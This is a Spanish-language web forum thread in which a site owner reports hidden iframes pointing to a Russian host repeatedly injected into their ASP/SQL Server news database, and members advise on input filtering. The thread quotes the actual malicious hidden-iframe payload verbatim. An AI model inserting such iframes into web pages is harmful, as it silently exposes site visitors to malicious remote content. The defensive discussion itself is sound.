Club Delphi  
    FTP   CCD     Buscar   Trucos   Trabajo   Foros

Retroceder   Foros Club Delphi > Principal > SQL
Registrarse FAQ Miembros Calendario Guía de estilo Temas de Hoy

Respuesta
 
Herramientas Buscar en Tema Desplegado
  #1  
Antiguo 02-08-2010
xiberclark xiberclark is offline
Registrado
 
Registrado: ago 2010
Posts: 2
Poder: 0
xiberclark Va por buen camino
ayuda con sql insertaron codigo malicioso en mi bd

Hola amigos de este gran club, tengo un problema y espero que puedan ayudarme, el problema empezo el dia sabado, tengo una web que tiene sistema de noticias en asp con bd en sql server , cuando me loguee para subir una noticia vi que en los registros mostraba una especie de frame en el titulo y en el contenido de las noticias , entre en una de los noticias para ver el detalle y vi este codigo <iframe src="nutcountry.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe><iframe src="nutcountry.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe>

y esto estaba en los campos de cada noticia , asi que entre a la bd y entre a la tabla de las noticias e hice un replace para limpiar los campos, pero al dia siguiente aparecio de nuevo, el detalle de todo es que ese codigo esta insertado en campos que tienen la propieda varchar , mas no esta en los campos integer, ahorita justo he tenido que limpiar de nuevo, porfavor si pueden ayudarme para evitar de nuevo ese ataque, ya avise al servicio tecnico del hosting y dicen que veran el problema pero demoran mucho


gracias

Responder Con Cita
  #2  
Antiguo 02-08-2010
Avatar de Enan0
Enan0 Enan0 is offline
Miembro
 
Registrado: may 2004
Ubicación: Argentina
Posts: 565
Poder: 20
Enan0 Va por buen camino
yo te diria que como primer paso. hagas un update de los Services Packs de la base de Datos, y el So.
Cambies los passwords..
y asi. vayas verificando todos los puntos de seguridad
Responder Con Cita
  #3  
Antiguo 02-08-2010
Avatar de roman
roman roman is offline
Moderador
 
Registrado: may 2003
Ubicación: Ciudad de México
Posts: 20.269
Poder: 10
roman Es un diamante en brutoroman Es un diamante en brutoroman Es un diamante en bruto
No creo que sea tanto un problema de seguridad de la base de datos, aunque nunca está de más que revises.

Más bien, dado que comentas que se trata de un sistema de noticias, ese tipo de inserción de códigos suele presentarse cuando no se programa con cuidado la parte que recibe el texto de la noticia. Un usuario con posibilidad de subir una noticia puede tranquilamente escribir, como parte de la "noticia" el código que describes. Si tu código no se encarga de limpiar de etiquetas HTML el texto subido, entonces éste se guardará en la base de datos. Cuando tu sistema despliegue esa noticia, el código insertado se mandará al navegador como parte del código HTML, ocasionando el efecto que has visto.

Por eso es que ese código sólo lo ves en los campos varchar, porque es en esos campós donde estás permitiendo que las personas escriban cualquier cosa sin verificar. Observa que esta inyección de código puede estar en el texto de la noticia, en el título, en el nombre del autor, etc., es decir, en cualquier campo de texto que no revises adecuadamente.

// Saludos
Responder Con Cita
  #4  
Antiguo 02-08-2010
Avatar de AzidRain
[AzidRain] AzidRain is offline
Miembro Premium
 
Registrado: sep 2005
Ubicación: Córdoba, Veracruz, México
Posts: 2.914
Poder: 21
AzidRain Va camino a la fama
Es precisamente como dice Román...por cierto, cortesía de nuestros amiguitos los rusos el mentado frame.

También puedes implementar un filtrado para permitir solo algunos tags html como negrillas, cursivas o algo similar y bloquear o eliminar todos los demás tags.
__________________
AKA "El animalito" ||Cordobés a mucha honra||
Responder Con Cita
  #5  
Antiguo 02-08-2010
xiberclark xiberclark is offline
Registrado
 
Registrado: ago 2010
Posts: 2
Poder: 0
xiberclark Va por buen camino
sobre filtrado

Hola amigos muchas gracias por comentariosn sobre mi problema , bueno claro el codigo se inserta en los campos que dice roman, aunque deseo saber como puedo poner filtros y evitar que inserten codigo html no se si podrian darme un ejemplo?
gracias
Responder Con Cita
  #6  
Antiguo 02-08-2010
Avatar de roman
roman roman is offline
Moderador
 
Registrado: may 2003
Ubicación: Ciudad de México
Posts: 20.269
Poder: 10
roman Es un diamante en brutoroman Es un diamante en brutoroman Es un diamante en bruto
El problema es que no conozco ASP. Yo trabajo con PHP que tiene funciones especiales para eliminar etiquetas HTML no deseadas, tales como strip_tags. Es posible que ASP cuente con algo similar.

// Saludos
Responder Con Cita
  #7  
Antiguo 02-08-2010
Avatar de AzidRain
[AzidRain] AzidRain is offline
Miembro Premium
 
Registrado: sep 2005
Ubicación: Córdoba, Veracruz, México
Posts: 2.914
Poder: 21
AzidRain Va camino a la fama
Seguramente este artículo te va a servir. O bien este otro, que hace uso de expresiones regulares.
__________________
AKA "El animalito" ||Cordobés a mucha honra||
Responder Con Cita
Respuesta



Normas de Publicación
no Puedes crear nuevos temas
no Puedes responder a temas
no Puedes adjuntar archivos
no Puedes editar tus mensajes

El código vB está habilitado
Las caritas están habilitado
Código [IMG] está habilitado
Código HTML está deshabilitado
Saltar a Foro

Temas Similares
Tema Autor Foro Respuestas Último mensaje
Malware, rootkits y código malicioso seoane Varios 3 02-04-2010 00:43:55
Ayuda en un código kbaby Varios 75 18-06-2008 14:08:17
Ayuda con código. wofox Varios 6 11-12-2007 00:16:21
Ayuda con un codigo JoNieve C++ Builder 0 21-04-2007 12:27:33
Ayuda con error en codigo :-( jorgegetafe Varios 6 07-02-2007 19:29:04


La franja horaria es GMT +2. Ahora son las 03:34:50.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Traducción al castellano por el equipo de moderadores del Club Delphi
Copyright 1996-2007 Club Delphi